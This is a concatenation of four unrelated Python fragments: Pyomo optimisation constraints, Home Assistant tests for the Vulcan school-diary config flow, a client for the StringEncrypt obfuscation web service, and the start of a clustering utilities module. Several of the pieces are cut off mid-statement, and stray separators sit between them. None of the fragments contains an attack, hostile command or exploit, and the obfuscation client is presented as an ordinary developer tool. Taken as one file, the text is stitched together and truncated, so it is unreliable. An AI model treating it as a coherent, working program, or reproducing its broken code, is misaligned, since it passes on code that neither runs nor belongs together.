m.c930 = Constraint(expr= m.x789 - 9*m.b996 <= 0)
m.c931 = Constraint(expr= m.x790 - 9*m.b997 <= 0)
m.c932 = Constraint(expr= m.x791 + 9*m.b995 <= 9)
m.c933 = Constraint(expr= m.x792 + 9*m.b996 <= 9)
m.c934 = Constraint(expr= m.x793 + 9*m.b997 <= 9)
m.c935 = Constraint(expr=(m.x794/(1e-6 + m.b998) - 1.1*log(1 + m.x746/(1e-6 + m.b998)))*(1e-6 + m.b998) <= 0)
m.c936 = Constraint(expr=(m.x795/(1e-6 + m.b999) - 1.1*log(1 + m.x747/(1e-6 + m.b999)))*(1e-6 + m.b999) <= 0)
m.c937 = Constraint(expr=(m.x796/(1e-6 + m.b1000) - 1.1*log(1 + m.x748/(1e-6 + m.b1000)))*(1e-6 + m.b1000) <= 0)
m.c938 = Constraint(expr= m.x749 == 0)
m.c939 = Constraint(expr= m.x750 == 0)
m.c940 = Constraint(expr= m.x751 == 0)
m.c941 = Constraint(expr= m.x797 == 0)
m.c942 = Constraint(expr= m.x798 == 0)
m.c943 = Constraint(expr= m.x799 == 0)
m.c944 = Constraint(expr= m.x314 - m.x746 - m.x749 == 0)
m.c945 = Constraint(expr= m.x315 - m.x747 - m.x750 == 0)
m.c946 = Constraint(expr= m.x316 - m.x748 - m.x751 == 0)
m.c947 = Constraint(expr= m.x332 - m.x794 - m.x797 == 0)
m.c948 = Constraint(expr= m.x333 - m.x795 - m.x798 == 0)
m.c949 = Constraint(expr= m.x334 - m.x796 - m.x799 == 0)
m.c950 = Constraint(expr= m.x746 - 15*m.b998 <= 0)
m.c951 = Constraint(expr= m.x747 - 15*m.b999 <= 0)
m.c952 = Constraint(expr= m.x748 - 15*m.b1000 <= 0)
m.c953 = Constraint(expr= m.x749 + 15*m.b998 <= 15)
m.c954 = Constraint(expr= m.x750 + 15*m.b999 <= 15)
m.c955 = Constraint(expr= m.x751 + 15*m.b1000 <= 15)
m.c956 = Constraint(expr= m.x794 - 3.04984759446376*m.b998 <= 0)
m.c957 = Constraint(expr= m.x795 - 3.04984759446376*m.b999 <= 0)
m.c958 = Constraint(expr= m.x796 - 3.04984759446376*m.b1000 <= 0)
m.c959 = Constraint(expr= m.x797 + 3.04984759446376*m.b998 <= 3.04984759446376)
m.c960 = Constraint(expr= m.x798 + 3.04984759446376*m.b999 <= 3.04984759446376)
m.c961 = Constraint(expr= m.x799 + 3.04984759446376*m.b1000 <= 3.04984759446376)
m.c962 = Constraint(expr= - 0.9*m.x755 + m.x854 == 0)
m.c963 = Constraint(expr= - 0.9*m.x756 + m.x855 == 0)
m.c964 = Constraint(expr= - 0.9*m.x757 + m.x856 == 0)
m.c965 = Constraint(expr= - m.x812 + m.x854 == 0)
m.c966 = Constraint(expr= - m.x813 + m.x855 == 0)
m.c967 = Constraint(expr= - m.x814 + m.x856 == 0)
m.c968 = Constraint(expr= m.x761 == 0)
m.c969 = Constraint(expr= m.x762 == 0)
m.c970 = Constraint(expr= m.x763 == 0)
m.c971 = Constraint(expr= m.x815 == 0)
m.c972 = Constraint(expr= m.x816 == 0)
m.c973 = Constraint(expr= m.x817 == 0)
m.c974 = Constraint(expr= m.x857 == 0)
m.c975 = Constraint(expr= m.x858 == 0)
m.c976
"""Test the Uonet+ Vulcan config flow."""
import json
from unittest import mock
from unittest.mock import patch
from vulcan import Account
from vulcan.model import Student
from homeassistant import config_entries, data_entry_flow
from homeassistant.components.vulcan import config_flow, const, register
from homeassistant.components.vulcan.config_flow import (
ClientConnectionError,
Keystore,
VulcanAPIException,
)
from homeassistant.const import CONF_PIN, CONF_REGION, CONF_SCAN_INTERVAL, CONF_TOKEN
from tests.common import MockConfigEntry, load_fixture
fake_keystore = Keystore("", "", "", "", "")
fake_account = Account(
login_id=1,
user_login="<EMAIL>",
user_name="<EMAIL>",
rest_url="rest_url",
)
async def test_show_form(hass):
"""Test that the form is served with no input."""
flow = config_flow.VulcanFlowHandler()
flow.hass = hass
result = await flow.async_step_user(user_input=None)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "auth"
@mock.patch("homeassistant.components.vulcan.config_flow.Vulcan.get_students")
@mock.patch("homeassistant.components.vulcan.config_flow.Account.register")
@mock.patch("homeassistant.components.vulcan.config_flow.Keystore.create")
async def test_config_flow_auth_success(
mock_keystore, mock_account, mock_student, hass
):
"""Test a successful config flow initialized by the user."""
mock_keystore.return_value = fake_keystore
mock_account.return_value = fake_account
mock_student.return_value = [
Student.load(load_fixture("fake_student_1.json", "vulcan"))
]
result = await hass.config_entries.flow.async_init(
const.DOMAIN, context={"source": config_entries.SOURCE_USER}
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "auth"
assert result["errors"] is None
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{CONF_TOKEN: "token", CONF_REGION: "region", CONF_PIN: "000000"},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
assert result["title"] == "<NAME>"
@mock.patch("homeassistant.components.vulcan.config_flow.Vulcan.get_students")
@mock.patch("homeassistant.components.vulcan.config_flow.Account.register")
@mock.patch("homeassistant.components.vulcan.config_flow.Keystore.create")
async def test_config_flow_auth_success_with_multiple_students(
mock_keystore, mock_account, mock_student, hass
):
"""Test a successful config flow with multiple students."""
mock_keystore.return_value = fake_keystore
mock_account.return_value = fake_account
mock_student.return_value = [
Student.load(student)
for student in [load_fixture("fake_student_1.json", "vulcan")]
+ [load_fixture("fake_student_2.json", "vulcan")]
]
result = await hass.config_entries.flow.async_init(
const.DOMAIN, context={"source": config_entries.SOURCE_USER}
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "auth"
assert result["errors"] is None
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{CONF_TOKEN: "token", CONF_REGION: "region", CONF_PIN: "000000"},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "select_student"
assert result["errors"] == {}
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"student": "0"},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
assert result["title"] == "<NAME>"
@mock.patch("homeassistant.components.vulcan.config_flow.Vulcan.get_students")
@mock.patch("homeassistant.components.vulcan.config_flow.Keystore.create")
@mock.patch("homeassistant.components.vulcan.config_flow.Account.register")
async def test_config_flow_reauth_success(
mock_account, mock_keystore, mock_student, hass
):
"""Test a successful config flow reauth."""
mock_keystore.return_value = fake_keystore
mock_account.return_value = fake_account
mock_student.return_value = [
Student.load(load_fixture("fake_student_1.json", "vulcan"))
]
MockConfigEntry(
domain=const.DOMAIN,
unique_id="0",
data={"student_id": "0", "login": "<EMAIL>"},
).add_to_hass(hass)
result = await hass.config_entries.flow.async_init(
const.DOMAIN, context={"source": config_entries.SOURCE_REAUTH}
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "reauth"
assert result["errors"] == {}
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{CONF_TOKEN: "token", CONF_REGION: "region", CONF_PIN: "000000"},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_ABORT
assert result["reason"] == "reauth_successful"
@mock.patch("homeassistant.components.vulcan.config_flow.Keystore.create")
@mock.patch("homeassistant.components.vulcan.config_flow.Account.register")
async def test_config_flow_reauth_with_errors(mock_account, mock_keystore, hass):
"""Test reauth config flow with errors."""
mock_keystore.return_value = fake_keystore
mock_account.return_value = fake_account
result = await hass.config_entries.flow.async_init(
const.DOMAIN, context={"source": config_entries.SOURCE_REAUTH}
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "reauth"
assert result["errors"] == {}
with patch(
"homeassistant.components.vulcan.config_flow.Account.register",
side_effect=VulcanAPIException("Invalid token."),
):
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{CONF_TOKEN: "token", CONF_REGION: "region", CONF_PIN: "000000"},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "reauth"
assert result["errors"] == {"base": "invalid_token"}
with patch(
"homeassistant.components.vulcan.config_flow.Account.register",
side_effect=VulcanAPIException("Expired token."),
):
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{CONF_TOKEN: "token", CONF_REGION: "region", CONF_PIN: "000000"},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "reauth"
assert result["errors"] == {"base": "expired_token"}
with patch(
"homeassistant.components.vulcan.config_flow.Account.register",
side_effect=VulcanAPIException("Invalid PIN."),
):
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{CONF_TOKEN: "token", CONF_REGION: "region", CONF_PIN: "000000"},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "reauth"
assert result["errors"] == {"base": "invalid_pin"}
with patch(
"homeassistant.components.vulcan.config_flow.Account.register",
side_effect=VulcanAPIException("Unknown error"),
):
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{CONF_TOKEN: "token", CONF_REGION: "region", CONF_PIN: "000000"},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "reauth"
assert result["errors"] == {"base": "unknown"}
with patch(
"homeassistant.components.vulcan.config_flow.Account.register",
side_effect=RuntimeError("Internal Server Error (ArgumentException)"),
):
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{CONF_TOKEN: "token", CONF_REGION: "region", CONF_PIN: "000000"},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "reauth"
assert result["errors"] == {"base": "invalid_symbol"}
with patch(
"homeassistant.components.vulcan.config_flow.Account.register",
side_effect=RuntimeError("Unknown error"),
):
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{CONF_TOKEN: "token", CONF_REGION: "region", CONF_PIN: "000000"},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "reauth"
assert result["errors"] == {"base": "unknown"}
with patch(
"homeassistant.components.vulcan.config_flow.Account.register",
side_effect=ClientConnectionError,
):
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{CONF_TOKEN: "token", CONF_REGION: "region", CONF_PIN: "000000"},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "reauth"
assert result["errors"] == {"base": "cannot_connect"}
with patch(
"homeassistant.components.vulcan.config_flow.Account.register",
side_effect=Exception,
):
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{CONF_TOKEN: "token", CONF_REGION: "region", CONF_PIN: "000000"},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "reauth"
assert result["errors"] == {"base": "unknown"}
@mock.patch("homeassistant.components.vulcan.config_flow.Vulcan.get_students")
@mock.patch("homeassistant.components.vulcan.config_flow.Keystore.create")
@mock.patch("homeassistant.components.vulcan.config_flow.Account.register")
async def test_multiple_config_entries(mock_account, mock_keystore, mock_student, hass):
"""Test a successful config flow for multiple config entries."""
mock_keystore.return_value = fake_keystore
mock_account.return_value = fake_account
mock_student.return_value = [
Student.load(load_fixture("fake_student_1.json", "vulcan"))
]
MockConfigEntry(
domain=const.DOMAIN,
unique_id="123456",
data=json.loads(load_fixture("fake_config_entry_data.json", "vulcan")),
).add_to_hass(hass)
await register.register(hass, "token", "region", "000000")
result = await hass.config_entries.flow.async_init(
const.DOMAIN, context={"source": config_entries.SOURCE_USER}
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "add_next_config_entry"
assert result["errors"] == {}
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"use_saved_credentials": False},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "auth"
assert result["errors"] is None
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{CONF_TOKEN: "token", CONF_REGION: "region", CONF_PIN: "000000"},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
assert result["title"] == "<NAME>"
@mock.patch("homeassistant.components.vulcan.config_flow.Vulcan.get_students")
async def test_multiple_config_entries_using_saved_credentials(mock_student, hass):
"""Test a successful config flow for multiple config entries using saved credentials."""
mock_student.return_value = [
Student.load(load_fixture("fake_student_1.json", "vulcan"))
]
MockConfigEntry(
domain=const.DOMAIN,
unique_id="123456",
data=json.loads(load_fixture("fake_config_entry_data.json", "vulcan")),
).add_to_hass(hass)
result = await hass.config_entries.flow.async_init(
const.DOMAIN, context={"source": config_entries.SOURCE_USER}
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "add_next_config_entry"
assert result["errors"] == {}
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"use_saved_credentials": True},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
assert result["title"] == "<NAME>"
@mock.patch("homeassistant.components.vulcan.config_flow.Vulcan.get_students")
async def test_multiple_config_entries_using_saved_credentials_2(mock_student, hass):
"""Test a successful config flow for multiple config entries using saved credentials (different situation)."""
mock_student.return_value = [
Student.load(load_fixture("fake_student_1.json", "vulcan"))
] + [Student.load(load_fixture("fake_student_2.json", "vulcan"))]
MockConfigEntry(
domain=const.DOMAIN,
unique_id="123456",
data=json.loads(load_fixture("fake_config_entry_data.json", "vulcan")),
).add_to_hass(hass)
result = await hass.config_entries.flow.async_init(
const.DOMAIN, context={"source": config_entries.SOURCE_USER}
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "add_next_config_entry"
assert result["errors"] == {}
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"use_saved_credentials": True},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "select_student"
assert result["errors"] == {}
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"student": "0"},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
assert result["title"] == "<NAME>"
@mock.patch("homeassistant.components.vulcan.config_flow.Vulcan.get_students")
async def test_multiple_config_entries_using_saved_credentials_3(mock_student, hass):
"""Test a successful config flow for multiple config entries using saved credentials."""
mock_student.return_value = [
Student.load(load_fixture("fake_student_1.json", "vulcan"))
]
MockConfigEntry(
entry_id="456",
domain=const.DOMAIN,
unique_id="234567",
data=json.loads(load_fixture("fake_config_entry_data.json", "vulcan"))
| {"student_id": "456"},
).add_to_hass(hass)
MockConfigEntry(
entry_id="123",
domain=const.DOMAIN,
unique_id="123456",
data=json.loads(load_fixture("fake_config_entry_data.json", "vulcan")),
).add_to_hass(hass)
result = await hass.config_entries.flow.async_init(
const.DOMAIN, context={"source": config_entries.SOURCE_USER}
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "add_next_config_entry"
assert result["errors"] == {}
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"use_saved_credentials": True},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "select_saved_credentials"
assert result["errors"] is None
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"credentials": "123"},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
assert result["title"] == "<NAME>"
@mock.patch("homeassistant.components.vulcan.config_flow.Vulcan.get_students")
async def test_multiple_config_entries_using_saved_credentials_4(mock_student, hass):
"""Test a successful config flow for multiple config entries using saved credentials (different situation)."""
mock_student.return_value = [
Student.load(load_fixture("fake_student_1.json", "vulcan"))
] + [Student.load(load_fixture("fake_student_2.json", "vulcan"))]
MockConfigEntry(
entry_id="456",
domain=const.DOMAIN,
unique_id="234567",
data=json.loads(load_fixture("fake_config_entry_data.json", "vulcan"))
| {"student_id": "456"},
).add_to_hass(hass)
MockConfigEntry(
entry_id="123",
domain=const.DOMAIN,
unique_id="123456",
data=json.loads(load_fixture("fake_config_entry_data.json", "vulcan")),
).add_to_hass(hass)
result = await hass.config_entries.flow.async_init(
const.DOMAIN, context={"source": config_entries.SOURCE_USER}
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "add_next_config_entry"
assert result["errors"] == {}
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"use_saved_credentials": True},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "select_saved_credentials"
assert result["errors"] is None
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"credentials": "123"},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "select_student"
assert result["errors"] == {}
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"student": "0"},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
assert result["title"] == "<NAME>"
async def test_multiple_config_entries_without_valid_saved_credentials(hass):
"""Test a unsuccessful config flow for multiple config entries without valid saved credentials."""
MockConfigEntry(
entry_id="456",
domain=const.DOMAIN,
unique_id="234567",
data=json.loads(load_fixture("fake_config_entry_data.json", "vulcan"))
| {"student_id": "456"},
).add_to_hass(hass)
MockConfigEntry(
entry_id="123",
domain=const.DOMAIN,
unique_id="123456",
data=json.loads(load_fixture("fake_config_entry_data.json", "vulcan")),
).add_to_hass(hass)
result = await hass.config_entries.flow.async_init(
const.DOMAIN, context={"source": config_entries.SOURCE_USER}
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "add_next_config_entry"
assert result["errors"] == {}
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"use_saved_credentials": True},
)
with patch(
"homeassistant.components.vulcan.config_flow.Vulcan.get_students",
side_effect=VulcanAPIException("The certificate is not authorized."),
):
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "select_saved_credentials"
assert result["errors"] is None
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"credentials": "123"},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "auth"
assert result["errors"] == {"base": "expired_credentials"}
async def test_multiple_config_entries_using_saved_credentials_with_connections_issues(
hass,
):
"""Test a unsuccessful config flow for multiple config entries without valid saved credentials."""
MockConfigEntry(
entry_id="456",
domain=const.DOMAIN,
unique_id="234567",
data=json.loads(load_fixture("fake_config_entry_data.json", "vulcan"))
| {"student_id": "456"},
).add_to_hass(hass)
MockConfigEntry(
entry_id="123",
domain=const.DOMAIN,
unique_id="123456",
data=json.loads(load_fixture("fake_config_entry_data.json", "vulcan")),
).add_to_hass(hass)
result = await hass.config_entries.flow.async_init(
const.DOMAIN, context={"source": config_entries.SOURCE_USER}
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "add_next_config_entry"
assert result["errors"] == {}
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"use_saved_credentials": True},
)
with patch(
"homeassistant.components.vulcan.config_flow.Vulcan.get_students",
side_effect=ClientConnectionError,
):
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "select_saved_credentials"
assert result["errors"] is None
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"credentials": "123"},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "select_saved_credentials"
assert result["errors"] == {"base": "cannot_connect"}
async def test_multiple_config_entries_using_saved_credentials_with_unknown_error(hass):
"""Test a unsuccessful config flow for multiple config entries without valid saved credentials."""
MockConfigEntry(
entry_id="456",
| |
# stringencrypt/stringencrypt.py
#!/usr/bin/env python
###############################################################################
#
# String Encryption and File Encryption for programmers & developers
#
# String Encrypt can help you hide the things that shouldn't be visible at
# first glance in your source code to anyone with a hex-editor.
#
# Supported programming languages code generation:
#
# * C/C++ - https://www.stringencrypt.com/c-cpp-encryption/
# * C# - https://www.stringencrypt.com/c-sharp-encryption/
# * Visual Basic .NET - https://www.stringencrypt.com/visual-basic-net-vb-net-encryption/
# * Delphi/Pascal - https://www.stringencrypt.com/delphi-pascal-encryption/
# * Java - https://www.stringencrypt.com/java-encryption/
# * JavaScript - https://www.stringencrypt.com/javascript-encryption/
# * Python - https://www.stringencrypt.com/python-encryption/
# * Ruby - https://www.stringencrypt.com/ruby-encryption/
# * AutoIt - https://www.stringencrypt.com/autoit-encryption/
# * PowerShell - https://www.stringencrypt.com/powershell-encryption/
# * Haskell - https://www.stringencrypt.com/haskell-encryption/
# * MASM - https://www.stringencrypt.com/masm-encryption/
# * FASM - https://www.stringencrypt.com/fasm-encryption/
#
# Version : StringEncrypt v1.0
# Python : Python v3
# Dependencies : requests (https://pypi.python.org/pypi/requests/)
# Author : <NAME> (<EMAIL>)
# Project page : https://www.stringencrypt.com
# Web page : https://www.pelock.com
#
###############################################################################
import zlib
import base64
from enum import *
# required external package - install with "pip install requests"
import requests
class StringEncrypt(object):
"""StringEncrypt Python 3 module"""
#
# @var string default StringEncrypt WebApi endpoint
#
API_URL = "https://www.stringencrypt.com/api.php"
#
# @var string WebApi key for the service
#
_activationCode = ""
#
# @var bool input string / raw bytes compression enabled (enabled by default)
#
# if you set it to true, you need to compress input string / raw bytes eg.
#
# compressed = @base64_encode(@gzcompress(string, 9))
#
# and after encryption you need to decompress encrypted data
#
# decompressed = @gzuncompress(@base64_decode(source));
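#
# a rough Python equivalent of the snippets above (this is what post_request()
# below does for the "string"/"bytes" parameters, where `data` is bytes):
#
# compressed = base64.b64encode(zlib.compress(data, 9)).decode()
# decompressed = zlib.decompress(base64.b64decode(source)).decode("utf-8")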
#
# options["compression"] = true/false
enableCompression = True
#
# @var bool treat input string as a UNICODE string (ANSI otherwise)
#
# options["unicode"] = true/false
useUnicode = True
class LangLocaleEncodings(Enum):
"""Input string default locale (only those listed below are supported currently)"""
def __str__(self):
return self.value
LANG_US = "en_US.utf8"
LANG_GB = "en_GB.utf8"
LANG_DE = "de_DE.utf8"
LANG_ES = "es_ES.utf8"
LANG_BE = "fr_BE.utf8"
LANG_FR = "fr_FR.utf8"
LANG_PL = "pl_PL.utf8"
#
# @var string input string locale for UTF-8 encoded strings (en_US locale is used by default)
#
langLocaleEncoding = LangLocaleEncodings.LANG_US
class NewLinesEncodings(Enum):
"""How to encode new lines, available values:
"lf" - Unix style
"crlf" - Windows style
"cr" - Mac style"""
def __str__(self):
return self.value
UNIX_STYLE_LF = "lf"
WINDOWS_STYLE_CRLF = "crlf"
MAC_STYLE_CR = "cr"
#
# @var string How to encode new lines (Unix LF is used by default)
#
newLinesEncoding = NewLinesEncodings.UNIX_STYLE_LF
class AnsiEncodings(Enum):
"""Destination ANSI string encoding (if UNICODE encoding is disabled)
only those listed below are supported"""
def __str__(self):
return self.value
WINDOWS_1250 = "WINDOWS-1250"
WINDOWS_1251 = "WINDOWS-1251"
WINDOWS_1252 = "WINDOWS-1252"
WINDOWS_1253 = "WINDOWS-1253"
WINDOWS_1254 = "WINDOWS-1254"
WINDOWS_1255 = "WINDOWS-1255"
WINDOWS_1256 = "WINDOWS-1256"
WINDOWS_1257 = "WINDOWS-1257"
WINDOWS_1258 = "WINDOWS-1258"
ISO_8859_1 = "ISO-8859-1"
ISO_8859_2 = "ISO-8859-2"
ISO_8859_3 = "ISO-8859-3"
ISO_8859_9 = "ISO-8859-9"
ISO_8859_10 = "ISO-8859-10"
ISO_8859_14 = "ISO-8859-14"
ISO_8859_15 = "ISO-8859-15"
ISO_8859_16 = "ISO-8859-16"
#
# @var string ANSI encoding if UNICODE mode is disabled (WINDOWS-1250 encoding is used by default)
#
ansiEncoding = AnsiEncodings.WINDOWS_1250
class OutputProgrammingLanguages(Enum):
"""Output programming language.
Only those listed below are supported, if you pass
other name, service will return ERROR_INVALID_LANG"""
def __str__(self):
return self.value
LANG_CPP = "cpp"
LANG_CSHARP = "csharp"
LANG_VBNET = "vbnet"
LANG_DELPHI = "delphi"
LANG_JAVA = "java"
LANG_JS = "js"
LANG_PYTHON = "python"
LANG_RUBY = "ruby"
LANG_AUTOIT = "autoit"
LANG_POWERSHELL = "powershell"
LANG_HASKELL = "haskell"
LANG_MASM = "masm"
LANG_FASM = "fasm"
#
# @var string Generate output source code in selected programming language (Python is selected by default)
#
outputProgrammingLanguage = OutputProgrammingLanguages.LANG_PYTHON
#
# @var integer minimum number of encryption commands
#
# Demo mode supports only up to 3 commands (50 in full version),
# if you pass more than this number, service will return
# ERROR_CMD_MIN
#
# options["cmd_min"] = 1
minEncryptionCommands = 1
#
# @var integer maximum number of encryption commands
#
# demo mode supports only up to 3 commands (50 in full version),
# if you pass more than this number, service will return
# ERROR_CMD_MAX
#
# options["cmd_max"] = 50
maxEncryptionCommands = 3
#
# @var bool store encrypted string as a local variable (if supported
# by the programming language), otherwise it's stored as
# a global variable
#
# options["local"] = true/false
declareAsLocalVariable = False
class ErrorCodes(IntEnum):
"""Possible error codes returned by the StringEncrypt WebAPI service"""
# @var integer success
ERROR_SUCCESS = 0
# @var integer label parameter is missing
ERROR_EMPTY_LABEL = 1
# @var integer label length is too long
ERROR_LENGTH_LABEL = 2
# @var integer input string is missing
ERROR_EMPTY_STRING = 3
# @var integer input file is missing
ERROR_EMPTY_BYTES = 4
# @var integer input string/file is missing
ERROR_EMPTY_INPUT = 5
# @var integer string length is too long
ERROR_LENGTH_STRING = 6
# @var integer bytes length is too long
ERROR_LENGTH_BYTES = 11
# @var integer programming language not supported
ERROR_INVALID_LANG = 7
# @var integer invalid locale defined
ERROR_INVALID_LOCALE = 8
# @var integer min. number of encryption commands error
ERROR_CMD_MIN = 9
# @var integer max. number of encryption commands error
ERROR_CMD_MAX = 10
# @var integer you need a valid code to use full version features
ERROR_DEMO = 100
def __init__(self, activation_code=None):
"""Initialize StringEncrypt class
:param activation_code: Activation code for the service (it can be empty for demo mode)
"""
self._activationCode = activation_code
def is_demo(self):
"""Login to the service using previously provided activation code and get the
information about the current license limits
:return: An array with the results or False on error
:rtype: bool,dict
"""
# parameters
params = {"command": "is_demo"}
return self.post_request(params)
def encrypt_file_contents(self, file_path, label):
"""Encrypt binary file contents
:param file_path: A path to any binary file. Demo mode doesn't support
this parameter and the service will return ERROR_DEMO
:param label: A label name. Demo mode supports up to 10 chars only
(64 in full version), if you pass more than this number, service
will return ERROR_LENGTH_LABEL
:return: An array with the results or False on error
:rtype: bool,dict
"""
source_file = open(file_path, 'rb')
bytes = source_file.read()
source_file.close()
if not bytes:
return False
# additional parameters
params_array = {"command": "encrypt", "bytes": bytes, "label": label}
return self.post_request(params_array)
def encrypt_string(self, string, label):
"""Encrypt a string into an encrypted source code in selected programming language
:param string: An input string in UTF-8 or ANSI format (by default UTF-8 is used)
demo mode supports up to 10 chars only, if you pass more
than that, service will return ERROR_LENGTH_STRING
:param label: label name. Demo mode supports up to 10 chars only
(64 in full version), if you pass more than this number, service
will return ERROR_LENGTH_LABEL
:return: An array with the results or False on error
:rtype: bool,dict
"""
# additional parameters
params_array = {"command": "encrypt", "string": string, "label": label}
return self.post_request(params_array)
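# A usage sketch (illustrative only; "XXXX-XXXX-XXXX-XXXX" is a placeholder
# activation code, and omitting it runs the WebAPI in demo mode):
#
# se = StringEncrypt("XXXX-XXXX-XXXX-XXXX")
# se.outputProgrammingLanguage = StringEncrypt.OutputProgrammingLanguages.LANG_CPP
# result = se.encrypt_string("Hello, world!", "szSecret")
# if result and result["error"] == StringEncrypt.ErrorCodes.ERROR_SUCCESS:
#     print(result["source"])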
def post_request(self, params_array):
"""Send a POST request to the server
:param params_array: An array with the parameters
:return: An array with the results or false on error
:rtype: bool,dict
"""
# add activation code to the parameters array
params_array["code"] = self._activationCode
# setup parameters for the "encrypt" command ("is_demo" doesn't require it)
if params_array["command"] == "encrypt":
params_array["unicode"] = 1 if self.useUnicode else 0
params_array["lang_locale"] = self.langLocaleEncoding
params_array["ansi_encoding"] = self.ansiEncoding
params_array["local"] = 1 if self.declareAsLocalVariable else 0
params_array["new_lines"] = self.newLinesEncoding
# number of encryption commands
params_array["cmd_min"] = self.minEncryptionCommands
params_array["cmd_max"] = self.maxEncryptionCommands
params_array["lang"] = self.outputProgrammingLanguage
#
# check if compression is enabled
#
if self.enableCompression:
params_array["compression"] = "1"
if "string" in params_array and params_array["string"]:
compressed_data = zlib.compress(bytes(params_array["string"], 'utf-8'), 9)
base64_encoded_data = base64.b64encode(compressed_data).decode()
params_array["string"] = base64_encoded_data
elif "bytes" in params_array and params_array["bytes"]:
compressed_data = zlib.compress(bytes(params_array["bytes"]), 9)
base64_encoded_data = base64.b64encode(compressed_data).decode()
params_array["bytes"] = base64_encoded_data
response = requests.post(self.API_URL, data=params_array)
# no response at all or an invalid response code
if not response or not response.ok:
return False
# decode to json array
result = response.json()
# decompress the output source code back into a string
if "source" in result and self.enableCompression and result["error"] == self.ErrorCodes.ERROR_SUCCESS:
result["source"] = str(zlib.decompress(base64.b64decode(result["source"])), "utf-8")
# append error code in string format
if "error" in result:
result["error_string"] = | |
# libs/utils.py
#!/usr/bin/env python3
import os
import re
import numpy as np
import bottleneck as bn
import pandas as pd
from scipy.special import gamma, binom
from scipy.stats import chi2
from scipy.spatial.distance import pdist, squareform
from sklearn.metrics import adjusted_rand_score
from sklearn.metrics.cluster import v_measure_score
from sklearn.cluster import AgglomerativeClustering
EPSILON = np.finfo(np.float64).resolution
log_EPSILON = np.log(EPSILON)
DOT_HEADER = 'digraph G {\n' \
'node [width=0.75 fillcolor="#a6cee3", style=filled, fontcolor=black, ' \
'shape=circle, fontsize=20, fontname="arial", fixedsize=True];\n'
DOT_CELLS = 'node [width=0.5, fillcolor="#e8bdc9", fontcolor=black, ' \
'style=filled, shape=square, fontsize=8, fontname="arial", fixedsize=True];\n'
# ------------------------------------------------------------------------------
# Mathematical functions
# ------------------------------------------------------------------------------
def check_beta_params(mean, var):
